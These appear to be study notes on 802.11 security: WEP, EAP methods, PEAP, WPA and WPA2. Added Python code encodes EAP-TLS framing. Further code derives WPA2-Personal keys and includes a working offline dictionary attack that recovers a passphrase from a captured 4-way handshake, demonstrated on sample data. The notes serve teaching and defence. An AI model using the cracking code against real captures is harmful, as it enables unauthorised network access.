Wired Equivalent Privacy (WEP)
Wired Equivalent Privacy (WEP) was the first 802.11 encryption scheme. It has several weaknesses and should not be used. They include:

Weak encryption that has been broken: RC4 with a 24-bit IV, so keystreams repeat and the key can be recovered from captured traffic (the FMS and PTW attacks)

Vulnerable to dictionary attacks when the key is derived from a passphrase

No authentication of the AP by the client, so a rogue access point can impersonate the network

Static keys that must be manually distributed to every client, and changed on every client when one is compromised

802.1x Extensible Authentication Protocols (EAP)
802.1x was originally developed for port-based access control on wired Ethernet switches and was adopted for wireless access control; EAP itself, the authentication framework that 802.1x carries, was originally defined for PPP. An EAP implementation requires a client wireless card with a supplicant, an authenticator (the access point) and an authentication server, all EAP capable. Until it is authenticated, a wireless client can only transmit EAP traffic (EAPOL frames). The RADIUS server authenticates the client in a challenge and response; whether the client also authenticates the server depends on the EAP method chosen, which is why the TLS-based methods below matter. EAP was originally defined in RFC 2284, which was made obsolete by RFC 3748; RFC 4017 lists the requirements an EAP method must meet for use on wireless LANs.

EAP – Flexible Authentication via Secure Tunneling (EAP-FAST)
EAP-FAST is Cisco's tunneled method (RFC 4851). It replaces certificates with a Protected Access Credential (PAC), a shared secret the server issues to each client. Cisco describes it as offering:

Mutual authentication of server and client, using the TLS handshake protocol keyed by the PAC

Immunity to man-in-the-middle attacks; this holds once a PAC is in place, but anonymous in-band provisioning in Phase 0 does not authenticate the server, so a rogue AP can play the server during provisioning

Ability to use multiple password authentication backends

Computational efficiency, because the tunnel is established from the symmetric PAC key rather than public-key operations

No requirement for client or server certificates

EAP-FAST consists of three phases:

Phase 0 — The client is dynamically provisioned with a PAC. The PAC can also be installed manually (out of band), so this phase is considered optional; if it is used, prefer server-authenticated provisioning over the anonymous form.

Phase 1 — Server and client use the PAC to authenticate each other and establish a TLS tunnel.

Phase 2 — The client sends its credentials through the tunnel for authentication with an inner method.

Extensible Authentication Protocol – Transport Layer Security (EAP-TLS)
EAP-TLS was originally defined in RFC 2716 and was revised as RFC 5216 in March 2008; RFC 4507 (TLS session resumption without server-side state) defines the session-ticket extension it can use to shorten reconnects. It uses a public key infrastructure (PKI): both client and server need a certificate for authentication, and each certificate must be issued by a certification authority (CA) that the other side trusts. The client is the supplicant, the authenticator is the AP and the authentication server is the RADIUS server. Because every client needs its own certificate, EAP-TLS is the strongest of these methods (there is no password to phish or guess) but the hardest to deploy.

EAP-TLS Authentication Process:

Client associates to the AP, which restricts the port to EAP (EAPOL) traffic only.

AP requests the client's identity and passes the response to the RADIUS server (carried in RADIUS EAP-Message attributes); the RADIUS server answers with an EAP-TLS Start.

The server sends its certificate in the TLS handshake. The client validates it against its trusted CA and responds with its own certificate and the TLS key-exchange messages, which starts the cryptographic negotiation.

After the RADIUS server validates the client certificate it completes the TLS handshake with the agreed cipher suite and session keys, returns EAP-Success, and hands the derived key material (the PMK) to the AP, which uses it to key the wireless link.
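The framing that carries this exchange, as an added example that is not part of the original notes or any vendor's code: it encodes the Identity request/response and the EAP-TLS Start from the steps above, splits a TLS record across EAP-TLS packets using the L/M/S flags from RFC 5216, and reassembles them while checking the declared length. The sample record bytes, the identity and the 400-byte fragment size are assumptions.

```python
import struct

# Added example (not from the original notes). EAP header from RFC 3748:
# Code(1) Identifier(1) Length(2) [Type(1) Type-Data...]
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
TYPE_IDENTITY, TYPE_EAP_TLS = 1, 13
# EAP-TLS flags byte (RFC 5216 section 3.1): Length included, More, Start
FLAG_L, FLAG_M, FLAG_S = 0x80, 0x40, 0x20


def eap_packet(code, identifier, eap_type=None, data=b""):
    """Encode one EAP packet; Success and Failure carry no Type field."""
    body = b"" if eap_type is None else bytes([eap_type]) + data
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def parse_eap(pkt):
    """Decode an EAP packet, rejecting a Length that disagrees with the buffer."""
    if len(pkt) < 4:
        raise ValueError("short EAP packet")
    code, identifier, length = struct.unpack("!BBH", pkt[:4])
    if length < 4 or length != len(pkt):
        raise ValueError("EAP length field does not match packet")
    eap_type = pkt[4] if length > 4 else None
    return code, identifier, eap_type, pkt[5:length]


def identity_exchange(identity: bytes, identifier: int = 1):
    """The authenticator's Identity request and the client's reply.
    The identity travels in cleartext; with plain EAP-TLS that is the real user name."""
    request = eap_packet(EAP_REQUEST, identifier, TYPE_IDENTITY)
    response = eap_packet(EAP_RESPONSE, identifier, TYPE_IDENTITY, identity)
    return request, response


def eap_tls_start(identifier: int):
    """The RADIUS server's EAP-TLS Start: Request, type 13, S flag, no data."""
    return eap_packet(EAP_REQUEST, identifier, TYPE_EAP_TLS, bytes([FLAG_S]))


def eap_tls_fragments(code, first_identifier, tls_record, max_frag):
    """Split a TLS record across EAP-TLS packets sent as Requests (server side).
    The first fragment sets L and carries the total TLS length; every fragment
    except the last sets M. On the wire each fragment is acknowledged with an
    empty EAP-TLS Response (echoing the identifier) before the next is sent;
    that acknowledgement round trip is not modelled here."""
    frags = []
    offset = 0
    ident = first_identifier
    while True:
        chunk = tls_record[offset:offset + max_frag]
        offset += len(chunk)
        flags = 0
        if not frags:
            flags |= FLAG_L
        if offset < len(tls_record):
            flags |= FLAG_M
        data = bytes([flags])
        if flags & FLAG_L:
            data += struct.pack("!I", len(tls_record))
        frags.append(eap_packet(code, ident, TYPE_EAP_TLS, data + chunk))
        ident = (ident + 1) & 0xFF
        if not flags & FLAG_M:
            return frags


def eap_tls_reassemble(packets):
    """Reassemble fragments and verify the declared TLS length, so a truncated
    or padded handshake message is rejected before it reaches the TLS library."""
    buf = b""
    declared = None
    for pkt in packets:
        _, _, eap_type, data = parse_eap(pkt)
        if eap_type != TYPE_EAP_TLS or not data:
            raise ValueError("not an EAP-TLS packet")
        flags, payload = data[0], data[1:]
        if flags & FLAG_L:
            declared = struct.unpack("!I", payload[:4])[0]
            payload = payload[4:]
        buf += payload
        if not flags & FLAG_M:
            break
    if declared is not None and declared != len(buf):
        raise ValueError("reassembled %d bytes, first fragment declared %d" % (len(buf), declared))
    return buf


if __name__ == "__main__":
    record = bytes(range(256)) * 4           # constructed stand-in for a TLS record
    frags = eap_tls_fragments(EAP_REQUEST, 3, record, 400)
    print(len(frags), "fragments;", "ok" if eap_tls_reassemble(frags) == record else "bad")
```

Two points worth noticing: the Identity response is cleartext, so with plain EAP-TLS the user name is visible to anyone sniffing the exchange (PEAP and EAP-FAST can put an anonymous outer identity here), and the reassembler refuses a fragment set whose total does not match the length announced in the first fragment, a check real supplicant and RADIUS code has to make before handing bytes to the TLS stack.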

Protected EAP (PEAP)
PEAP only requires the authentication server to have a certificate; the client authenticates with a password-based inner method inside a TLS tunnel. The client must actually validate that certificate: a supplicant configured to skip validation, or to trust any CA, will build its tunnel to a rogue AP that presents any certificate, and the rogue then collects the inner credentials (MS-CHAPv2 challenge/response pairs, which can be cracked offline).

PEAP has two phases:

Phase 1 – The client authenticates the server by verifying its certificate against the CA, and an encrypted TLS tunnel is created between client and server.

Phase 2 – The client authenticates through the tunnel with an inner EAP method, most commonly EAP-MSCHAPv2, so the password exchange is protected from eavesdropping.

WPA
WPA with TKIP is no longer secure: the Beck-Tews and Ohigashi-Morii attacks recover the MIC key and decrypt or inject short packets in about a minute (they do not recover the pre-shared key, but injecting forged frames is enough to call it broken). It is not recommended for use, however it is still on the test. WPA with TKIP encryption was developed as an interim standard, created to maintain backward compatibility with hardware that had supported WEP, which is why it kept RC4. WPA performs authentication using either 802.1x/EAP or preshared keys prior to the key management phase (the 4-way handshake). WPA uses the Temporal Key Integrity Protocol (TKIP), the Message Integrity Check (MIC, also called Michael) and per-packet keying (PPK) to patch WEP's IV reuse and forgery problems.

802.11i or WPA2
802.11i is the IEEE amendment; WPA2 is the Wi-Fi Alliance certification for products that implement it and is the name used more commonly. It provides stronger encryption, AES in CCMP mode rather than the weaker RC4 used by WEP and WPA. As a result it commonly required a hardware upgrade.

Key WPA2 facts from the ONT book:

Uses 802.1x for authentication (in enterprise mode)

Uses a similar method of key distribution and renewal as WPA (the 4-way handshake for pairwise keys and the group key handshake)

Supports Proactive Key Caching (PKC), so a roaming client can skip the full 802.1x exchange at the next AP

Has Intrusion Detection System (IDS), a feature of the Cisco WLAN products rather than of 802.11i itself

WPA/WPA2 provide two modes of operation:

Personal mode — Authentication is performed using a PSK derived from the passphrase and the SSID; anyone who captures a 4-way handshake can guess the passphrase offline, so its strength depends entirely on the passphrase

Enterprise mode — 802.1x/EAP and an AAA/RADIUS server are used for authentication, and each client ends up with its own master key
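Personal mode in code, as an added example that is not from the original notes or the ONT book: it derives the PMK from passphrase and SSID the way 802.11i does, expands it into the PTK with the handshake nonces, computes the MIC on message 2 of the 4-way handshake, and then shows the attacker's side, recovering the passphrase from a captured handshake with a wordlist. The MAC addresses, nonces, RSN IE and wordlist are constructed sample data; the PMK for passphrase "password" and SSID "IEEE" is the 802.11i Annex H test vector.

```python
import hashlib
import hmac

# Added example (not from the original notes). Derives the WPA/WPA2-Personal
# keys as 802.11i specifies and shows why a captured 4-way handshake allows an
# offline dictionary attack. All addresses, nonces and frames are constructed.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK (PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Returns (KCK, KEK, TK): KCK signs the handshake, KEK wraps the group key,
    TK is the CCMP data key. Everything here except the PMK is sent in the clear."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return ptk[:16], ptk[16:32], ptk[32:48]


MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of Key Descriptor fields before the MIC


def build_eapol_key_msg2(snonce: bytes, rsn_ie: bytes) -> bytes:
    """EAPOL-Key frame for message 2 of the 4-way handshake with the MIC zeroed.
    Key Information 0x010a = pairwise, MIC bit set, descriptor version 2 (HMAC-SHA1-128)."""
    body = (
        b"\x02"                            # descriptor type: RSN
        + b"\x01\x0a"                      # key information
        + b"\x00\x10"                      # key length (16 = CCMP)
        + (1).to_bytes(8, "big")           # replay counter
        + snonce                           # 32-byte SNonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused in msg 2)
        + bytes(16)                        # MIC placeholder
        + len(rsn_ie).to_bytes(2, "big") + rsn_ie
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 = Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the whole EAPOL frame with its MIC field zeroed; WPA2 uses HMAC-SHA1 cut to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def sign_frame(kck: bytes, frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, signed_msg2, wordlist):
    """Attacker's view: SSID (beacon), MACs and nonces (messages 1 and 2) and the
    MIC on message 2 are all captured; only the passphrase is missing."""
    target = signed_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck, _, _ = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, signed_msg2), target):
            return candidate
    return None


# Constructed sample capture (real nonces are random; these are fixed for the demo).
SSID = "IEEE"
AA = bytes.fromhex("001122334455")   # AP MAC (assumed)
SPA = bytes.fromhex("66778899aabb")  # client MAC (assumed)
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/CCMP/PSK


def demo(passphrase="password", wordlist=("letmein", "wireless", "password", "hunter2")):
    """Legitimate client signs message 2; the attacker then guesses the passphrase."""
    kck, _, _ = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    msg2 = sign_frame(kck, build_eapol_key_msg2(SNONCE, RSN_IE))
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each guess costs one PBKDF2 run of 4096 SHA-1 iterations plus a few HMACs, which is what makes long random passphrases the only real defence in personal mode; enterprise mode avoids the problem because the PMK comes out of the EAP exchange and is never derived from a guessable secret.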

I will end with this quote; I wish I could find the reference, but it is probably from the ONT book:

Some people mistakenly think that if the AP is configured not to broadcast its SSID, they have a secure wireless LAN; that is not true. When a legitimate wireless client with the correct SSID attempts to associate with its AP, the SSID is exchanged over the air unencrypted; that means that an illegitimate user can easily capture and use the SSID.